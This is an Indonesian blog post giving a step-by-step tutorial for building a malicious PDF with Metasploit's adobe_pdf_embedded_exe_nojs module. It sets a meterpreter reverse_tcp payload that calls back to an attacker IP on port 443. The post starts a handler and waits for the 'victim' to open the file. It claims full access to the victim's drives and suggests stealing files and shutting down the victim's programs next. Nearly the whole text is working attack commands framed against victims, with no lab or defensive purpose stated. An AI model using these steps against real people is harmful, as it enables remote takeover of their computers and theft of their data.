Rabu, 08 Februari 2017

Exploit Windows Dengan File PDF

Bigboss.web.id - Kali ini saya akan memberikan tutorial exploit windows menggunakan file pdf dengan menggunakan metasploit, fungsi dari exploit adalah salah satu cara untuk masuk ke sistem korban dengan cara menanamkan backdoor berupa file pdf

Pada tutorial kali ini saya menggunakan kali linux sana dan korban menggunakan windows 7 64 bit, oke langsung saja kita praktek

Langkah pertama adalah ketikkan perintah "service postgresql start"
Masuk ke console metasploit dengan perintah "msfconsole"

Pilih exploit apa yang akan kita gunakan, kali ini saya ingin membuat exploit berupa file pdf, ketikkan "use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs"
Lalu "set payload windows/meterpreter/reverse_tcp"
Kita set nama payload yang akan kita buat "set filename Bigboss.web.id.pdf"
Set port yang akan kita gunakan "set lport 443"
Set IP yang kita gunakan (IP Attacker) "set lhost 192.168.1.100"
Lalu kita buat exploitnya
Selanjutnya kita ambil file expliot yang sudah kita buat tadi, pada contoh lokasi exploit yang saya buat ada di direktori "/root/.msf4/local" dengan nama file "Bigboss.web.id.pdf"
Lalu kembali buka metasploit dan ketikkan perintah "use exploit/multi/handler"
Set payloadnya "set payload windows/meterpreter/reverse_tcp"
Set portnya "set lport 443"
Set IP kita (Attacker) "set lhost 192.168.1.100"
Lalu jalankan exploit dan tunggu hingga korban membuka file pdf yang telah kita siapkan
Jika korban telah membuka file tersebut maka kita sudah dapat mengakses dan melakukan apapun yang kita mau ke komputer korban, pada kasus ini saya berhasil masuk dan berada di direktori E: korban
Bukti kita telah dapat mengakses sistem korban dan dapat melihat isi dari drive C:
Sekian tutorial exploit kali ini, untuk selanjutnya masih banyak yang bisa kita lakukan mulai dari mengambil file ataupun menjalankan dan mematikan semua program yang terpasang di komputer korban dengan perintah metasploit lainnya

0 komentar:

Posting Komentar